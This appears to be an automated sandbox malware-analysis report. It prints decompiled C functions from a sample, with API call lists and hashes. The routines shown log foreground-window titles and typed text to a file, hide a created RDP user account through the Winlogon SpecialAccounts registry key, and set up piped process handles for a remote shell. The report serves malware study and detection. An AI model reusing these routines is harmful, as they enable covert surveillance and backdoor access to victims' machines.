                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D18E66 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 147filestringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D18E66(void* __ecx, void* __edx, void* __eflags) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _v12;
				void* _v16;
				short _v536;
				int _t35;
				intOrPtr _t37;
				int _t39;
				intOrPtr _t40;
				WCHAR* _t41;
				intOrPtr _t43;
				void* _t44;
				int _t46;
				intOrPtr _t48;
				intOrPtr _t50;
				long _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				void* _t59;
				intOrPtr _t61;
				intOrPtr _t63;
				long _t65;
				intOrPtr _t66;
				void* _t70;
				void* _t73;
				intOrPtr _t83;
				void* _t94;
				void* _t97;
				void* _t98;
				void* _t100;

				_t94 = __edx;
				_v16 = __ecx;
				E02D11052( &_v536, 0, 0x208);
				_v8 = 0;
				_t35 = GetWindowTextW(GetForegroundWindow(),  &_v536, 0x104);
				_t106 = _t35;
				if(_t35 <= 0) {
					E02D132FF( &_v8, _t94, L"{Unknown}");
				} else {
					_t73 = E02D135E5( &_v12,  &_v536);
					E02D13335(E02D1346A( &_v8, _t94, _t106, "{"), _t106, _t73);
					E02D1346A(_t74, _t94, _t106, "}");
					E02D15EA5(_v12);
					_v12 = 0;
				}
				_t37 =  *0x2d296a0; // 0x0
				_t39 = lstrlenW(_t37 + 0x210);
				_t40 =  *0x2d296a0; // 0x0
				if(_t39 == 0) {
					L6:
					_t41 = _t40 + 0x210;
					__eflags = _t41;
					lstrcpyW(_t41, _v8);
					_t43 =  *0x2d296a0; // 0x0
					 *((intOrPtr*)(_t43 + 0xa10)) = 0;
				} else {
					_t70 = E02D13248( &_v8, E02D135E5( &_v12, _t40 + 0x210));
					E02D15EA5(_v12);
					_t40 =  *0x2d296a0; // 0x0
					_v12 = 0;
					if(_t70 == 0) {
						goto L6;
					} else {
						 *(_t40 + 0xa10) = 1;
					}
				}
				_t44 = CreateFileW( *(_t43 + 0xc), 4, 1, 0, 4, 0x80, 0);
				_t83 =  *0x2d296a0; // 0x0
				 *(_t83 + 4) = _t44;
				if( *((intOrPtr*)(_t83 + 0xa10)) == 0) {
					_t21 = _t83 + 8; // 0x8
					_t98 = L"\r\n";
					_t54 = lstrlenW(_t98);
					_t55 =  *0x2d296a0; // 0x0
					WriteFile( *(_t55 + 4), _t98, _t54, _t21, 0);
					_t57 =  *0x2d296a0; // 0x0
					_t59 = E02D13261( &_v8);
					_t61 =  *0x2d296a0; // 0x0
					WriteFile( *(_t61 + 4), _v8, _t59 + _t59, _t57 + 8, 0);
					_t63 =  *0x2d296a0; // 0x0
					_t100 = L"\r\n";
					_t65 = lstrlenW(_t100);
					_t66 =  *0x2d296a0; // 0x0
					WriteFile( *(_t66 + 4), _t100, _t65, _t63 + 8, 0);
					_t83 =  *0x2d296a0; // 0x0
				}
				_t97 = _v16;
				_t28 = _t83 + 8; // 0x8
				_t46 = lstrlenW(_t97);
				_t48 =  *0x2d296a0; // 0x0
				WriteFile( *(_t48 + 4), _t97, _t46 + _t46, _t28, 0);
				_t50 =  *0x2d296a0; // 0x0
				CloseHandle( *(_t50 + 4));
				return E02D15EA5(_v8);
			}
































                                                                    0x02d18e66
                                                                    0x02d18e79
                                                                    0x02d18e84
                                                                    0x02d18e8c
                                                                    0x02d18ea2
                                                                    0x02d18ea8
                                                                    0x02d18eaa
                                                                    0x02d18ef5
                                                                    0x02d18eac
                                                                    0x02d18eb6
                                                                    0x02d18ecf
                                                                    0x02d18edb
                                                                    0x02d18ee3
                                                                    0x02d18ee8
                                                                    0x02d18ee8
                                                                    0x02d18efa
                                                                    0x02d18f0b
                                                                    0x02d18f0f
                                                                    0x02d18f14
                                                                    0x02d18f4f
                                                                    0x02d18f52
                                                                    0x02d18f52
                                                                    0x02d18f58
                                                                    0x02d18f5e
                                                                    0x02d18f63
                                                                    0x02d18f16
                                                                    0x02d18f28
                                                                    0x02d18f32
                                                                    0x02d18f37
                                                                    0x02d18f3c
                                                                    0x02d18f41
                                                                    0x00000000
                                                                    0x02d18f43
                                                                    0x02d18f43
                                                                    0x02d18f43
                                                                    0x02d18f41
                                                                    0x02d18f79
                                                                    0x02d18f7f
                                                                    0x02d18f91
                                                                    0x02d18f94
                                                                    0x02d18f98
                                                                    0x02d18f9b
                                                                    0x02d18fa2
                                                                    0x02d18fa5
                                                                    0x02d18fae
                                                                    0x02d18fb0
                                                                    0x02d18fc1
                                                                    0x02d18fc9
                                                                    0x02d18fd2
                                                                    0x02d18fd4
                                                                    0x02d18fd9
                                                                    0x02d18fe5
                                                                    0x02d18fe8
                                                                    0x02d18ff1
                                                                    0x02d18ff3
                                                                    0x02d18ff3
                                                                    0x02d18ff9
                                                                    0x02d18ffc
                                                                    0x02d19003
                                                                    0x02d19008
                                                                    0x02d19011
                                                                    0x02d19013
                                                                    0x02d1901b
                                                                    0x02d1902d

                                                                    APIs
                                                                    • GetForegroundWindow.USER32(?,?,?), ref: 02D18E8F
                                                                    • GetWindowTextW.USER32 ref: 02D18EA2
                                                                    • lstrlenW.KERNEL32(-00000210,{Unknown},?,?), ref: 02D18F0B
                                                                    • lstrcpyW.KERNEL32 ref: 02D18F58
                                                                    • CreateFileW.KERNEL32(?,00000004,00000001,00000000,00000004,00000080,00000000,?,?), ref: 02D18F79
                                                                    • lstrlenW.KERNEL32(02D24AD0,00000008,00000000,?,?), ref: 02D18FA2
                                                                    • WriteFile.KERNEL32(?,02D24AD0,00000000,?,?), ref: 02D18FAE
                                                                    • WriteFile.KERNEL32(?,?,00000000,-00000008,00000000,?,?), ref: 02D18FD2
                                                                    • lstrlenW.KERNEL32(02D24AD0,-00000008,00000000,?,?), ref: 02D18FE5
                                                                    • WriteFile.KERNEL32(?,02D24AD0,00000000,?,?), ref: 02D18FF1
                                                                    • lstrlenW.KERNEL32(?,00000008,00000000,?,?), ref: 02D19003
                                                                    • WriteFile.KERNEL32(?,?,00000000,?,?), ref: 02D19011
                                                                    • CloseHandle.KERNEL32(?,?,?), ref: 02D1901B
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13335: lstrcatW.KERNEL32(00000000,745D0770), ref: 02D13365
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen$File$Write$Windowlstrcpy$CloseCreateForegroundFreeHandleTextVirtuallstrcat
                                                                    • String ID: {Unknown}
                                                                    • API String ID: 2314120260-4054869793
                                                                    • Opcode ID: ccb5570c773ec1bfce2f93919e36a5bd50e4bf4ac78fdd1b9a6feea855d2bc53
                                                                    • Instruction ID: 84dce999c596c811c41abf87f2c49cddd2f64a6e8cae5638fdc3d9eca6b31b72
                                                                    • Opcode Fuzzy Hash: ccb5570c773ec1bfce2f93919e36a5bd50e4bf4ac78fdd1b9a6feea855d2bc53
                                                                    • Instruction Fuzzy Hash: 0D519071A40244FFDB10EF54EC99EDA77A9EF64304F5544A4E905A7340DB31AD18CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1E3FA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 237registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1E3FA(void* __edx, char _a4, char _a8) {
				void* _v12;
				char _v16;
				int _v20;
				char _v36;
				void _v44;
				void* _t51;
				int _t56;
				int _t70;
				void* _t104;
				signed int _t115;
				void* _t161;
				void* _t162;
				void* _t163;
				int _t172;

				_t161 = __edx;
				InitializeCriticalSection( &_v44);
				_t115 = 6;
				DeleteCriticalSection(memcpy(0x2e5e020,  &_v44, _t115 << 2));
				EnterCriticalSection(0x2e5e020);
				_t167 = _a4;
				_t111 = _a8;
				 *0x2e5e084 = _a4;
				 *0x2e5e078 = 0x2e5d000;
				 *0x2e5e074 = _a8;
				if(E02D1DE1F(_t161) == 0) {
					_t51 = E02D1F51D();
					__eflags = _t51 - 6;
					if(_t51 < 6) {
						L14:
						E02D14F2B(_t167, E02D14B91( &_v36, 2, 0x2e5e07c, 0x2e5e080));
						E02D14B6E( &_v36);
						LeaveCriticalSection(0x2e5e020);
						__eflags = 0;
						return 0;
					}
					_t56 = E02D1F4CE();
					__eflags = _t56;
					if(_t56 != 0) {
						goto L14;
					}
					__eflags = E02D1FBFC() - 1;
					if(__eflags == 0) {
						_t162 = 8;
						E02D13437(0x2e5e07c, E02D134A7( &_a4, _t162, __eflags));
						E02D15EA5(_a4);
						_t163 = 8;
						E02D13437(0x2e5e080, E02D134A7( &_a4, _t163, __eflags));
						E02D15EA5(_a4);
						_t172 = 0;
						RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList", 0, 0, 0, 0xf013f, 0,  &_v12,  &_v20);
						_v16 = 0;
						RegSetValueExW(_v12,  *0x2e5e07c, 0, 4,  &_v16, 4);
						RegCloseKey(_v12);
						_t70 = E02D1D418(0x2e5e07c, 0x2e5e080);
						__eflags = _t70;
						if(_t70 != 0) {
							E02D2165B(_a8, _t163, E02D135E5( &_a4, L"rudp"), 0x2e5e07c);
							E02D15EA5(_a4);
							E02D2165B(_a8, _t163, E02D135E5( &_a8, L"rpdp"), 0x2e5e080);
							E02D15EA5(_a8);
							E02D11F4B(0x2e5e038, E02D1E2E7, 0x2e5e020);
							LeaveCriticalSection(0x2e5e020);
							return 1;
						}
						E02D14F2B(_t167, E02D14B91( &_v36, 9, 0x2e5e07c, 0x2e5e080));
						E02D14B6E( &_v36);
						L12:
						LeaveCriticalSection(0x2e5e020);
						return _t172;
					}
					E02D14F2B(_t167, E02D14B91( &_v36, 1, 0x2e5e07c, 0x2e5e080));
					E02D14B6E( &_v36);
					_t172 = 0;
					goto L12;
				}
				E02D13437(0x2e5e07c, E02D2168E(_t111, _t161,  &_a8, E02D135E5( &_a4, L"rudp")));
				E02D15EA5(_a8);
				_a8 = 0;
				E02D15EA5(_a4);
				E02D13437(0x2e5e080, E02D2168E(_t111, _t161,  &_a8, E02D135E5( &_a4, L"rpdp")));
				E02D15EA5(_a8);
				_a8 = 0;
				E02D15EA5(_a4);
				if(E02D13261(0x2e5e07c) != 0 || E02D13261(0x2e5e080) != 0) {
					E02D14F2B(_t167, E02D14B91( &_v36, 8, 0x2e5e07c, 0x2e5e080));
					E02D14B6E( &_v36);
				} else {
					_t104 = E02D135E5( &_a4, 0x2d24648);
					E02D14F2B(_t167, E02D14B91( &_v36, 8, E02D135E5( &_a8, 0x2d24648), _t104));
					E02D14B6E( &_v36);
					E02D15EA5(_a8);
					_a8 = 0;
					E02D15EA5(_a4);
				}
				_t172 = 1;
				goto L12;
			}

















                                                                    0x02d1e3fa
                                                                    0x02d1e407
                                                                    0x02d1e40f
                                                                    0x02d1e41e
                                                                    0x02d1e42a
                                                                    0x02d1e430
                                                                    0x02d1e433
                                                                    0x02d1e436
                                                                    0x02d1e43c
                                                                    0x02d1e446
                                                                    0x02d1e453
                                                                    0x02d1e554
                                                                    0x02d1e559
                                                                    0x02d1e55c
                                                                    0x02d1e6cf
                                                                    0x02d1e6e6
                                                                    0x02d1e6ee
                                                                    0x02d1e6f4
                                                                    0x02d1e6fa
                                                                    0x00000000
                                                                    0x02d1e6fa
                                                                    0x02d1e562
                                                                    0x02d1e567
                                                                    0x02d1e569
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1e574
                                                                    0x02d1e577
                                                                    0x02d1e5a6
                                                                    0x02d1e5b5
                                                                    0x02d1e5bd
                                                                    0x02d1e5c4
                                                                    0x02d1e5d5
                                                                    0x02d1e5dd
                                                                    0x02d1e5e5
                                                                    0x02d1e5ff
                                                                    0x02d1e60a
                                                                    0x02d1e61a
                                                                    0x02d1e623
                                                                    0x02d1e62f
                                                                    0x02d1e634
                                                                    0x02d1e636
                                                                    0x02d1e683
                                                                    0x02d1e68b
                                                                    0x02d1e6a1
                                                                    0x02d1e6a9
                                                                    0x02d1e6be
                                                                    0x02d1e6c4
                                                                    0x00000000
                                                                    0x02d1e6cc
                                                                    0x02d1e64b
                                                                    0x02d1e653
                                                                    0x02d1e658
                                                                    0x02d1e65e
                                                                    0x00000000
                                                                    0x02d1e664
                                                                    0x02d1e590
                                                                    0x02d1e598
                                                                    0x02d1e59d
                                                                    0x00000000
                                                                    0x02d1e59d
                                                                    0x02d1e478
                                                                    0x02d1e480
                                                                    0x02d1e48a
                                                                    0x02d1e48d
                                                                    0x02d1e4b3
                                                                    0x02d1e4bb
                                                                    0x02d1e4c3
                                                                    0x02d1e4c6
                                                                    0x02d1e4d7
                                                                    0x02d1e53f
                                                                    0x02d1e547
                                                                    0x02d1e4e4
                                                                    0x02d1e4ed
                                                                    0x02d1e50a
                                                                    0x02d1e512
                                                                    0x02d1e51a
                                                                    0x02d1e522
                                                                    0x02d1e525
                                                                    0x02d1e525
                                                                    0x02d1e54e
                                                                    0x00000000

                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(?,?,?), ref: 02D1E407
                                                                    • DeleteCriticalSection.KERNEL32(?,?,?), ref: 02D1E41E
                                                                    • EnterCriticalSection.KERNEL32(02E5E020,?,?), ref: 02D1E42A
                                                                      • Part of subcall function 02D1DE1F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters,?,02E5E020,?,?,02D1E451,?,?), ref: 02D1DE51
                                                                    • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?,00000000,00000000,?,?), ref: 02D1E5FF
                                                                    • RegSetValueExW.ADVAPI32(?,00000000,00000004,?,00000004,?,?), ref: 02D1E61A
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 02D1E623
                                                                    • LeaveCriticalSection.KERNEL32(02E5E020,00000000,02E5E07C,02E5E080,?,?), ref: 02D1E65E
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13261: lstrlenW.KERNEL32(745D0770,02D13646,?,?,?,02D2150A,02D235DB,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,02D235AB,00000000,745D0770,00000000), ref: 02D13268
                                                                    • LeaveCriticalSection.KERNEL32(02E5E020,00000000,rpdp,02E5E080,00000000,rudp,02E5E07C,02E5E07C,02E5E080,?,?), ref: 02D1E6C4
                                                                    • LeaveCriticalSection.KERNEL32(02E5E020,00000000,?,?), ref: 02D1E6F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leavelstrlen$lstrcpy$CloseCreateDeleteEnterFreeInitializeOpenValueVirtual
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList$rpdp$rudp
                                                                    • API String ID: 2046459734-177601018
                                                                    • Opcode ID: 2303524d0e9b763be83a07911a0a57152e99df0f104e44ea75d71d4596987d6a
                                                                    • Instruction ID: 2750787f81428820550fdc208188f246e16d9c501ac41b518575bfbf2a77fe3e
                                                                    • Opcode Fuzzy Hash: 2303524d0e9b763be83a07911a0a57152e99df0f104e44ea75d71d4596987d6a
                                                                    • Instruction Fuzzy Hash: 08715071690228BAEB14FF60FC95EAE776AEF58714F408415ED06A6B80DB349E05CF70
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1EAFB Relevance: 19.6, APIs: 13, Instructions: 135pipethreadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1EAFB(void* __eflags, char _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct _SECURITY_ATTRIBUTES _v36;
				void* _t54;
				void* _t61;
				void* _t64;
				int _t66;
				void* _t76;
				int _t94;
				void* _t95;

				E02D1EA89(0x2d29558);
				_v12 = _v12 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t94 = 1;
				_v20 = _v20 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36.lpSecurityDescriptor = _v36.lpSecurityDescriptor & 0x00000000;
				_v36.nLength = 0xc;
				_v36.bInheritHandle = 1;
				if(CreatePipe( &_v12,  &_v8,  &_v36, 0) == 0) {
					L7:
					E02D1EC8C( &_v12);
					E02D1EC8C( &_v8);
					E02D1EC8C( &_v16);
					E02D1EC8C( &_v20);
					E02D1EC8C( &_v24);
					E02D1EA89(0x2d29558);
					_t94 = 0;
				} else {
					_t54 = GetCurrentProcess();
					if(DuplicateHandle(GetCurrentProcess(), _v8, _t54,  &_v16, 0, 1, 2) == 0 || CreatePipe( &_v24,  &_v20,  &_v36, 0) == 0) {
						goto L7;
					} else {
						_t61 = GetCurrentProcess();
						if(DuplicateHandle(GetCurrentProcess(), _v12, _t61, 0x2d29560, 0, 0, 2) == 0) {
							goto L7;
						} else {
							_t64 = GetCurrentProcess();
							_t66 = DuplicateHandle(GetCurrentProcess(), _v20, _t64, 0x2d29564, 0, 0, 2);
							_t101 = _t66;
							if(_t66 == 0) {
								goto L7;
							} else {
								E02D1EC8C( &_v12);
								E02D1EC8C( &_v20);
								E02D1362D(_t95,  &_a4);
								if(E02D1E891(_t95, _t101,  &_v20, _v8, _v24, _v16) == 0) {
									goto L7;
								} else {
									E02D1EC8C( &_v8);
									E02D1EC8C( &_v24);
									E02D1EC8C( &_v16);
									 *0x2d29568 = CreateEventA(0, 1, 0, 0);
									_t76 = CreateThread(0, 0, E02D1E92A, 0x2d29558, 0, 0x2d29570);
									 *0x2d2956c = _t76;
									if(_t76 == 0) {
										goto L7;
									}
								}
							}
						}
					}
				}
				E02D15EA5(_a4);
				return _t94;
			}
















                                                                    0x02d1eb09
                                                                    0x02d1eb0e
                                                                    0x02d1eb15
                                                                    0x02d1eb1b
                                                                    0x02d1eb1f
                                                                    0x02d1eb20
                                                                    0x02d1eb24
                                                                    0x02d1eb28
                                                                    0x02d1eb32
                                                                    0x02d1eb3d
                                                                    0x02d1eb49
                                                                    0x02d1ec47
                                                                    0x02d1ec4a
                                                                    0x02d1ec52
                                                                    0x02d1ec5a
                                                                    0x02d1ec62
                                                                    0x02d1ec6a
                                                                    0x02d1ec74
                                                                    0x02d1ec79
                                                                    0x02d1eb4f
                                                                    0x02d1eb5e
                                                                    0x02d1eb71
                                                                    0x00000000
                                                                    0x02d1eb93
                                                                    0x02d1eb9e
                                                                    0x02d1ebab
                                                                    0x00000000
                                                                    0x02d1ebb1
                                                                    0x02d1ebbc
                                                                    0x02d1ebc5
                                                                    0x02d1ebc7
                                                                    0x02d1ebc9
                                                                    0x00000000
                                                                    0x02d1ebcb
                                                                    0x02d1ebce
                                                                    0x02d1ebd6
                                                                    0x02d1ebeb
                                                                    0x02d1ebf7
                                                                    0x00000000
                                                                    0x02d1ebf9
                                                                    0x02d1ebfc
                                                                    0x02d1ec04
                                                                    0x02d1ec0c
                                                                    0x02d1ec33
                                                                    0x02d1ec38
                                                                    0x02d1ec3e
                                                                    0x02d1ec45
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1ec45
                                                                    0x02d1ebf7
                                                                    0x02d1ebc9
                                                                    0x02d1ebab
                                                                    0x02d1eb71
                                                                    0x02d1ec7e
                                                                    0x02d1ec89

                                                                    APIs
                                                                      • Part of subcall function 02D1EA89: GetCurrentThreadId.KERNEL32 ref: 02D1EA95
                                                                      • Part of subcall function 02D1EA89: SetEvent.KERNEL32(00000000), ref: 02D1EAA9
                                                                      • Part of subcall function 02D1EA89: WaitForSingleObject.KERNEL32(02D2956C,00001388), ref: 02D1EAB6
                                                                      • Part of subcall function 02D1EA89: TerminateThread.KERNEL32(02D2956C,000000FE), ref: 02D1EAC7
                                                                    • CreatePipe.KERNEL32(00000000,00000000,?,00000000,?,?,00000000), ref: 02D1EB41
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000001,00000002,?,00000000), ref: 02D1EB5E
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02D1EB64
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 02D1EB6D
                                                                    • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000,?,00000000), ref: 02D1EB85
                                                                    • GetCurrentProcess.KERNEL32(02D29560,00000000,00000000,00000002,?,00000000), ref: 02D1EB9E
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02D1EBA4
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 02D1EBA7
                                                                    • GetCurrentProcess.KERNEL32(02D29564,00000000,00000000,00000002,?,00000000), ref: 02D1EBBC
                                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02D1EBC2
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02D1EC18
                                                                    • CreateThread.KERNEL32 ref: 02D1EC38
                                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 02D1EBC5
                                                                      • Part of subcall function 02D1EC8C: CloseHandle.KERNEL32(02D29568,02D29558,02D1EADC,?,00000000,02D12A8C,00000000,exit,00000000,start), ref: 02D1EC96
                                                                      • Part of subcall function 02D1362D: lstrcpyW.KERNEL32 ref: 02D13657
                                                                      • Part of subcall function 02D1E891: CreateProcessW.KERNEL32 ref: 02D1E8E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CurrentProcess$Create$Handle$DuplicateThread$EventPipe$CloseObjectSingleTerminateWaitlstrcpy
                                                                    • String ID:
                                                                    • API String ID: 337272696-0
                                                                    • Opcode ID: cc6d649f4953b5b98c50b2ae77528d577f7d4befa7bf114f8679803e5dc5c4d5
                                                                    • Instruction ID: 1477a081d7e8a10fc79a1c14c8de24ad393f282769223639313b0ead11e3f174
                                                                    • Opcode Fuzzy Hash: cc6d649f4953b5b98c50b2ae77528d577f7d4befa7bf114f8679803e5dc5c4d5
                                                                    • Instruction Fuzzy Hash: 45415F71E40219BAEB15EBA1ED55FEEBB7EEF50745F100015A901B26C0DBB49E08CF61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00411669 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___free_lconv_mon.LIBCMT ref: 004116AD
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411262
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411274
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411286
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411298
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112AA
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112BC
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112CE
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112E0
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 004112F2
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411304
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411316
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 00411328
                                                                      • Part of subcall function 00411245: _free.LIBCMT ref: 0041133A
                                                                    • _free.LIBCMT ref: 004116A2
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 004116C4
                                                                    • _free.LIBCMT ref: 004116D9
                                                                    • _free.LIBCMT ref: 004116E4
                                                                    • _free.LIBCMT ref: 00411706
                                                                    • _free.LIBCMT ref: 00411719
                                                                    • _free.LIBCMT ref: 00411727
                                                                    • _free.LIBCMT ref: 00411732
                                                                    • _free.LIBCMT ref: 0041176A
                                                                    • _free.LIBCMT ref: 00411771
                                                                    • _free.LIBCMT ref: 0041178E
                                                                    • _free.LIBCMT ref: 004117A6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                    • String ID:
                                                                    • API String ID: 161543041-0
                                                                    • Opcode ID: a4d3aa18bc232d42e33238a0a82706238f2805589507b0d8f9697b7231289369
                                                                    • Instruction ID: 45ea7b2fa5b796892eefd2f212ff2afbecec9812976f126a4dcde4366d6748c2
                                                                    • Opcode Fuzzy Hash: a4d3aa18bc232d42e33238a0a82706238f2805589507b0d8f9697b7231289369
                                                                    • Instruction Fuzzy Hash: D9315331A006049FDB21AB7AD845BAB73E4EF40314F14452FE659DB2A1DB39EC84CB1C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405600 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 300registrylibraryloaderCOMMON
